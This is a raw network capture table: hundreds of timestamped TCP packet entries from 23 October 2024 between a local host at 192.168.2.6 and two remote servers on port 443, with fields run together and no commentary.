                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.061952114 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062110901 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062187910 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062201023 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062288046 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062365055 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062374115 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062453032 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062541008 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062628984 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062661886 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062669039 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062721014 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.062727928 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.063163996 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.063170910 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066489935 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066550970 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066597939 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066649914 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066672087 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066715956 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066760063 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066766977 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066807985 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.066821098 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.067150116 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.067194939 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.067202091 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.072258949 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.072339058 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.072348118 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.072561979 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.099307060 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.099370956 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.101949930 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.102015972 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.114317894 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.114397049 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.114645004 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.114653111 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.142252922 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.142355919 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.143714905 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.143824100 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.143853903 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.143882036 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144047022 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144098997 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144109011 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144150019 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144155979 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144289970 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144548893 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144603968 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144604921 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.144613028 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145715952 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145781994 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145812035 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145868063 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145903111 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145930052 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.145945072 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.146583080 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.146657944 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.146672964 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.146850109 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.149707079 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.153562069 CEST49797443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.153598070 CEST44349797141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.156517029 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.156614065 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.157073021 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.157272100 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.157296896 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.157489061 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.157913923 CEST49821443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.157934904 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.158603907 CEST49821443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.158608913 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.163929939 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.164366961 CEST49820443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.164402962 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.164839983 CEST49820443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.164853096 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.171762943 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.172024965 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.172074080 CEST49822443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.172094107 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.172101974 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.172619104 CEST49822443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.172629118 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.179893970 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180095911 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180179119 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180250883 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180260897 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180335045 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180392981 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180399895 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180499077 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.180927992 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.181433916 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.181520939 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.181541920 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.181550980 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.181616068 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186136961 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186229944 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186383009 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186393976 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186805010 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186851978 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186858892 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.186930895 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.187189102 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.187390089 CEST49816443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.187406063 CEST44349816141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.189834118 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.189862967 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.189891100 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.189899921 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.189908028 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.189945936 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.190006018 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.190048933 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.190056086 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.190181971 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.190192938 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.208764076 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.208822966 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.212133884 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.212426901 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.212435961 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.215861082 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.215936899 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.216408014 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.216489077 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.217014074 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.217020988 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.220556021 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.220607996 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.220752001 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.220801115 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.245471954 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260092020 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260287046 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260626078 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260675907 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260684013 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260723114 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260727882 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260739088 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260777950 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.260783911 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.261514902 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.263277054 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.263338089 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.290800095 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.290858984 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.293931007 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.294063091 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.294150114 CEST49821443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.294248104 CEST49821443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.294260979 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.294270992 CEST49821443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.294275999 CEST4434982113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.296483994 CEST49830443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.296508074 CEST4434983013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.296716928 CEST49830443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.296941042 CEST49830443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.296947956 CEST4434983013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.298491001 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.298690081 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.298743963 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.298760891 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.298970938 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299057007 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299057961 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299088955 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299339056 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299550056 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299726963 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299812078 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299912930 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299921989 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.299981117 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.300337076 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.302576065 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.302767038 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.302838087 CEST49820443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.303035975 CEST49820443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.303035975 CEST49820443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.303075075 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.303097963 CEST4434982013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.304853916 CEST49831443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.304888964 CEST4434983113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.305028915 CEST49831443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.305171967 CEST49831443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.305191994 CEST4434983113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306478977 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306519985 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306529999 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306538105 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306617975 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306624889 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306675911 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306895971 CEST49815443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.306905985 CEST44349815141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.309488058 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.309501886 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.309556007 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.309963942 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.309977055 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.312673092 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.312839031 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.312922001 CEST49822443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.313035011 CEST49822443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.313049078 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.313066959 CEST49822443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.313074112 CEST4434982213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.315259933 CEST49833443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.315327883 CEST4434983313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.315418959 CEST49833443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.315514088 CEST49833443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.315532923 CEST4434983313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.327584028 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.327620029 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.327661991 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.327670097 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.327698946 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.341916084 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.341924906 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.358975887 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.359922886 CEST49825443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.359982014 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.360409975 CEST49825443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.360425949 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.362665892 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.363066912 CEST49823443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.363084078 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.363632917 CEST49823443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.363636971 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364381075 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364517927 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364579916 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364588976 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364684105 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364775896 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364797115 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364804983 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364844084 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.364866972 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.365021944 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.365068913 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.365076065 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.369532108 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.369610071 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.369616985 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.373970032 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.390191078 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409811974 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409821987 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409848928 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409879923 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409888029 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409898043 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.409945965 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417439938 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417534113 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417578936 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417624950 CEST44349817141.193.213.10192.168.2.6
